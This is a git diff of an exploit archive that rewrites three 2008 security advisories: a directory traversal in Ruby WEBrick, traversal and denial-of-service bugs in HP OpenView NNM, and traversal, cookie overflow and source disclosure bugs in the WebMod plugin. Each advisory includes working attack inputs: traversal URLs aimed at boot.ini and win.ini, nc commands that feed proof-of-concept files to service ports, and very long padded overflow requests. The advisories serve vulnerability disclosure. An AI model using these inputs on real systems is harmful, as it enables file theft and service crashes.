- -Example: - -http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini - - -2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems. - - - - - - - - -Additional info -*************** - -WEBrick is used to build own HTTP servers and used in many applications such as Metasploit 3.1 and Karma Tools - - - - -Fix Information -*************** - -fixed on 03.03.2008. - -http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/ - - -Patches can be downloaded here: - - -1.8 series -Please upgrade to 1.8.5-p115 or 1.8.6-p114. - (md5sum: 20ca6cc87eb077296806412feaac0356) - (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3) -1.9 series -Please apply the following patch to lib/webrick/httpservlet/filehandler.rb. - (md5sum: b7b58aed40fa1609a67f53cfd3a13257) - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and - -penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI - -DSS standards. Digital Security Research Group focuses on web application and database security problems with - -vulnerability reports, advisories and whitepapers posted regularly on our website. 
- - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-03-06] +------------------------------------------------------------------------------------ +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018 + + +Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1) +Versions Affected: + 1.8.4 and all prior versions + 1.8.5-p114 and all prior versions + 1.8.6-p113 and all prior versions + 1.9.0-1 and all prior version + +Vendor URL: http://www.ruby-lang.org/ +Bugs: Directory traversal File Download +Exploits: YES +Reported: 20.02.2008 +Vendor response: 22.02.2008 +Solution: 03.03.2008 +Date of Public Advisory: 06.03.2008 +Authors: Alexandr Polyakov, Stas Svistunovich + Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +WEBrick Httpd server has directory traversal security vulnerability. + +WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. +Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. +Ruby on Rails uses WEBrick as a quick and easy webserver to start developing your Rails applications. +However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment. + + + + +Details +******* + +The following programs are vulnerable. + +Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option +Programs that publish files using WEBrick::HTTPServlet::FileHandler + +Affected systems are: +1. Systems that accept backslash (\) as a path separator, such as Windows. +2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X. + + +This vulnerability has the following impacts. +1. Attacker can access private files by sending a url with url encoded backslash (\). 
This exploit works only on systems that accept backslash as a path separator. + +Example: + +http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini + + +2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems. + + + + + + + + +Additional info +*************** + +WEBrick is used to build own HTTP servers and used in many applications such as Metasploit 3.1 and Karma Tools + + + + +Fix Information +*************** + +fixed on 03.03.2008. + +http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/ + + +Patches can be downloaded here: + + +1.8 series +Please upgrade to 1.8.5-p115 or 1.8.6-p114. + (md5sum: 20ca6cc87eb077296806412feaac0356) + (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3) +1.9 series +Please apply the following patch to lib/webrick/httpservlet/filehandler.rb. + (md5sum: b7b58aed40fa1609a67f53cfd3a13257) + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and + +penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI + +DSS standards. Digital Security Research Group focuses on web application and database security problems with + +vulnerability reports, advisories and whitepapers posted regularly on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-03-06] diff --git a/platforms/multiple/remote/5430.txt b/platforms/multiple/remote/5430.txt index 21df47daa..17d344af6 100755 --- a/platforms/multiple/remote/5430.txt +++ b/platforms/multiple/remote/5430.txt 
@@ -1,151 +1,151 @@ -####################################################################### - - Luigi Auriemma - -Application: HP OpenView Network Node Manager - http://www.openview.hp.com/products/nnm/ -Versions: <= 7.53 -Platforms: Windows (tested), Solaris, Linux, HP-UX -Bugs: A] CGIs directory traversal - B] Denial of Service in ovalarmsrv - C] NULL pointer in ovalarmsrv - D] process termination in ovtopmd -Exploitation: remote -Date: 11 Apr 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - ->From vendor's website: -OpenView NNM "automates the process of developing a hyper-accurate -topology of your physical network, virtual network services and the -complex relationships between them. It then uses that topology as the -basis for intelligent root cause analysis to enhance network -availability and performance." - - -####################################################################### - -======= -2) Bugs -======= - ---------------------------- -A] CGIs directory traversal ---------------------------- - -The CGIs available in NNM use some instructions which filters malicious -chars in the parameters passed by the clients, for example to avoid -directory traversal attacks, XSS and so on. - -The path delimiter filtered by these CGIs is the backslash char, so -using the slash will allow an attacker to download the files from the -disk on which is installed NNM. 
- - ----------------------------------- -B] Denial of Service in ovalarmsrv ----------------------------------- - -The ovalarmsrv service listening on port 2954 can be easily freezed -with CPU at 100% and without the possibility of handling further -requests on both its ports 2953 and 2954 simply sending an incomplete -multi line request. -In short the last numeric parameters of the requests 25, 45, 46, 47 and -81 is used to specify how much sub-arguments (one per line) will be -sent. -So ovalarmsrv starts a loop which terminates when all the sub arguments -are received; closing the connection or not sending all or part of -these arguments will freeze the entire service. -The following are all the supported requests and their "sscanf" format: - - REQUEST_CONTRIB_EVENTS (22): "%d %d %s" - REQUEST_PRINT (25): "%d %d %d %d %s" - REQUEST_DETAILS (33): "%d %d %s" - REQUEST_EVENT_DELETE (35): "%d %d %s" - REQUEST_EVENT_ACK (36): "%d %d %s" - REQUEST_RUN_ACTION (37): "%d %d %s %s" - REQUEST_SPECDATA (41): - REQUEST_EVENT_UNACK (44): "%d %d %s" - REQUEST_SAVE (45): "%d %d %d %d %s" - REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]" - REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]" - REQUEST_CONF_ACTIONS (48): "%d %d\n" - REQUEST_RESTORE_STATE (62): "%d %[^\n]" - REQUEST_SAVE_DIR (63): - REQUEST_LOCALE (66): "%d" - REQUEST_FORMAT_PRINT (81): "%d %d %d %d %s" - REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]" - - ------------------------------ -C] NULL pointer in ovalarmsrv ------------------------------ - -The parameter which specifies the amount of sub-arguments described -above is used to allocate a certain amount of initial dynamic memory -(value * 2) for storing all the sub-arguments which is then -reallocated wheen needed. - -Specifying a too big unallocable amount of sub-arguments results in a -NULL pointer which will crash the service. 
- - ---------------------------------- -D] process termination in ovtopmd ---------------------------------- - -The ovtopmd service listening on port 2532 uses a special type of -packet (0x36) for forcing the termination of the process ("Exiting due -to request of ovtopmd -k."), so an attacker can use this packet for -causing a Denial of Service. - - -####################################################################### - -=========== -3) The Code -=========== - - -A] -http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini - -B,C,D] -http://aluigi.org/poc/closedviewx.zip - - nc SERVER 2954 -v -v -w 2 < closedviewx1.txt - nc SERVER 2954 -v -v < closedviewx2.txt - nc SERVER 2532 -v -v < closedviewx3.txt - - -####################################################################### - -====== -4) Fix -====== - - -HP has been alerted and is working on a fix - - -####################################################################### - -# milw0rm.com [2008-04-11] +####################################################################### + + Luigi Auriemma + +Application: HP OpenView Network Node Manager + http://www.openview.hp.com/products/nnm/ +Versions: <= 7.53 +Platforms: Windows (tested), Solaris, Linux, HP-UX +Bugs: A] CGIs directory traversal + B] Denial of Service in ovalarmsrv + C] NULL pointer in ovalarmsrv + D] process termination in ovtopmd +Exploitation: remote +Date: 11 Apr 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +>From vendor's website: +OpenView NNM "automates the process of developing a hyper-accurate +topology of your physical network, virtual network services and the +complex relationships between them. 
It then uses that topology as the +basis for intelligent root cause analysis to enhance network +availability and performance." + + +####################################################################### + +======= +2) Bugs +======= + +--------------------------- +A] CGIs directory traversal +--------------------------- + +The CGIs available in NNM use some instructions which filters malicious +chars in the parameters passed by the clients, for example to avoid +directory traversal attacks, XSS and so on. + +The path delimiter filtered by these CGIs is the backslash char, so +using the slash will allow an attacker to download the files from the +disk on which is installed NNM. + + +---------------------------------- +B] Denial of Service in ovalarmsrv +---------------------------------- + +The ovalarmsrv service listening on port 2954 can be easily freezed +with CPU at 100% and without the possibility of handling further +requests on both its ports 2953 and 2954 simply sending an incomplete +multi line request. +In short the last numeric parameters of the requests 25, 45, 46, 47 and +81 is used to specify how much sub-arguments (one per line) will be +sent. +So ovalarmsrv starts a loop which terminates when all the sub arguments +are received; closing the connection or not sending all or part of +these arguments will freeze the entire service. 
+The following are all the supported requests and their "sscanf" format: + + REQUEST_CONTRIB_EVENTS (22): "%d %d %s" + REQUEST_PRINT (25): "%d %d %d %d %s" + REQUEST_DETAILS (33): "%d %d %s" + REQUEST_EVENT_DELETE (35): "%d %d %s" + REQUEST_EVENT_ACK (36): "%d %d %s" + REQUEST_RUN_ACTION (37): "%d %d %s %s" + REQUEST_SPECDATA (41): + REQUEST_EVENT_UNACK (44): "%d %d %s" + REQUEST_SAVE (45): "%d %d %d %d %s" + REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]" + REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]" + REQUEST_CONF_ACTIONS (48): "%d %d\n" + REQUEST_RESTORE_STATE (62): "%d %[^\n]" + REQUEST_SAVE_DIR (63): + REQUEST_LOCALE (66): "%d" + REQUEST_FORMAT_PRINT (81): "%d %d %d %d %s" + REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]" + + +----------------------------- +C] NULL pointer in ovalarmsrv +----------------------------- + +The parameter which specifies the amount of sub-arguments described +above is used to allocate a certain amount of initial dynamic memory +(value * 2) for storing all the sub-arguments which is then +reallocated wheen needed. + +Specifying a too big unallocable amount of sub-arguments results in a +NULL pointer which will crash the service. + + +--------------------------------- +D] process termination in ovtopmd +--------------------------------- + +The ovtopmd service listening on port 2532 uses a special type of +packet (0x36) for forcing the termination of the process ("Exiting due +to request of ovtopmd -k."), so an attacker can use this packet for +causing a Denial of Service. 
+ + +####################################################################### + +=========== +3) The Code +=========== + + +A] +http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini + +B,C,D] +http://aluigi.org/poc/closedviewx.zip + + nc SERVER 2954 -v -v -w 2 < closedviewx1.txt + nc SERVER 2954 -v -v < closedviewx2.txt + nc SERVER 2532 -v -v < closedviewx3.txt + + +####################################################################### + +====== +4) Fix +====== + + +HP has been alerted and is working on a fix + + +####################################################################### + +# milw0rm.com [2008-04-11] diff --git a/platforms/multiple/remote/5534.txt b/platforms/multiple/remote/5534.txt index c9b70ed08..610f75a9a 100755 --- a/platforms/multiple/remote/5534.txt +++ b/platforms/multiple/remote/5534.txt 
@@ -1,151 +1,151 @@
-#######################################################################
-
- Luigi Auriemma
-
-Application: WebMod
- http://www.djeyl.net/w.php
-Versions: <= 0.48
-Platforms: Windows and Linux
-Bugs: A] directory traversal
- B] Cookie buffer-overflow
- C] parser.cpp arbitrary memory writing
- D] scripts source disclosure
-Exploitation: remote
-Date: 03 May 2008
-Author: Luigi Auriemma
- e-mail: aluigi@autistici.org
- web: aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bugs
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
-WebMod is an open source MetaMod plugin which acts as a web server for
-Half-Life running on the equivalent TCP port of the UDP one used by the
-game.
-
-
-#######################################################################
-
-=======
-2) Bugs
-=======
-
-----------------------
-A] directory traversal
-----------------------
-
-WebMod uses an anti-directory traversal check which searchs for any
-"../" pattern in the HTTP request of the client.
-So it's enough to use a "..\" pattern to bypass the check and being
-able to download any file from the disk where Half-Life is running
-included the configuration files of the game server (like
-..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg).
-Note that this bug works only on Windows servers.
-
->From server.cpp:
-
-void clientHandle(int connfd, httpquery_t *query, int tid)
- ...
- if(strstr(str,"../")) // hack attempt, display index page
- {
- str[0]='\0';
- }
-
-
--------------------------
-B] Cookie buffer-overflow
--------------------------
-
-A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a
-stack based buffer-overflow.
-
->From server.cpp:
-
-void connectHandle(void *data)
-{
-char *input;
-char buf[MYSOCK_BUFLEN+1];
- ...
- for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)
- buf[j]=input[i];
-
-
---------------------------------------
-C] parser.cpp arbitrary memory writing
---------------------------------------
-
-The functions in parser.cpp are affected by some memory corruption
-vulnerabilities with different effects depending by the type of
-variable/script used.
-In short a value longer than MAX_FILE_SIZE (16384) bytes can lead to
-the writing of custom data in a custom memory address through strcat
-(auth.w?mode) or a NULL pointer (auth.w?redir) or an invalid memory
-access (the rconpass parameter of auth.w) and so on.
-
-
-----------------------------
-D] scripts source disclosure
-----------------------------
-
-Adding a dot at the end of the requested URI allows the viewing of the
-script source code instead of executing it.
-This bug (which should work only on FAT/NTFS filesystems) can be
-considered a security vulnerability ONLY if the server runs custom
-scripts.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-http://aluigi.org/poc/webmodz.zip
-
- nc SERVER PORT -v -v < webmodz1.txt
-
-GET /..\..\..\..\..\..\boot.ini HTTP/1.0
-
- nc SERVER PORT -v -v < webmodz2.txt
-
-GET /config.w HTTP/1.0
-
-Cookie: 
rconpass=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                              - - nc SERVER PORT -v -v < webmodz3.txt - -GET /auth.w?mode=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   HTTP/1.0 - - nc SERVER PORT -v -v < webmodz4.txt - -GET /auth.w. 
HTTP/1.0
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-No fix
-
-
-#######################################################################
-
-# milw0rm.com [2008-05-03]
+#######################################################################
+
+ Luigi Auriemma
+
+Application: WebMod
+ http://www.djeyl.net/w.php
+Versions: <= 0.48
+Platforms: Windows and Linux
+Bugs: A] directory traversal
+ B] Cookie buffer-overflow
+ C] parser.cpp arbitrary memory writing
+ D] scripts source disclosure
+Exploitation: remote
+Date: 03 May 2008
+Author: Luigi Auriemma
+ e-mail: aluigi@autistici.org
+ web: aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bugs
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+WebMod is an open source MetaMod plugin which acts as a web server for
+Half-Life running on the equivalent TCP port of the UDP one used by the
+game.
+
+
+#######################################################################
+
+=======
+2) Bugs
+=======
+
+----------------------
+A] directory traversal
+----------------------
+
+WebMod uses an anti-directory traversal check which searchs for any
+"../" pattern in the HTTP request of the client.
+So it's enough to use a "..\" pattern to bypass the check and being
+able to download any file from the disk where Half-Life is running
+included the configuration files of the game server (like
+..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg).
+Note that this bug works only on Windows servers.
+
+>From server.cpp:
+
+void clientHandle(int connfd, httpquery_t *query, int tid)
+ ...
+ if(strstr(str,"../")) // hack attempt, display index page
+ {
+ str[0]='\0';
+ }
+
+
+-------------------------
+B] Cookie buffer-overflow
+-------------------------
+
+A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a
+stack based buffer-overflow.
+
+>From server.cpp:
+
+void connectHandle(void *data)
+{
+char *input;
+char buf[MYSOCK_BUFLEN+1];
+ ...
+ for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)
+ buf[j]=input[i];
+
+
+--------------------------------------
+C] parser.cpp arbitrary memory writing
+--------------------------------------
+
+The functions in parser.cpp are affected by some memory corruption
+vulnerabilities with different effects depending by the type of
+variable/script used.
+In short a value longer than MAX_FILE_SIZE (16384) bytes can lead to
+the writing of custom data in a custom memory address through strcat
+(auth.w?mode) or a NULL pointer (auth.w?redir) or an invalid memory
+access (the rconpass parameter of auth.w) and so on.
+
+
+----------------------------
+D] scripts source disclosure
+----------------------------
+
+Adding a dot at the end of the requested URI allows the viewing of the
+script source code instead of executing it.
+This bug (which should work only on FAT/NTFS filesystems) can be
+considered a security vulnerability ONLY if the server runs custom
+scripts.
+ + +####################################################################### + +=========== +3) The Code +=========== + + +http://aluigi.org/poc/webmodz.zip + + nc SERVER PORT -v -v < webmodz1.txt + +GET /..\..\..\..\..\..\boot.ini HTTP/1.0 + + nc SERVER PORT -v -v < webmodz2.txt + +GET /config.w HTTP/1.0 + +Cookie: rconpass=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                            + + nc SERVER PORT -v -v < webmodz3.txt + +GET /auth.w?mode=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
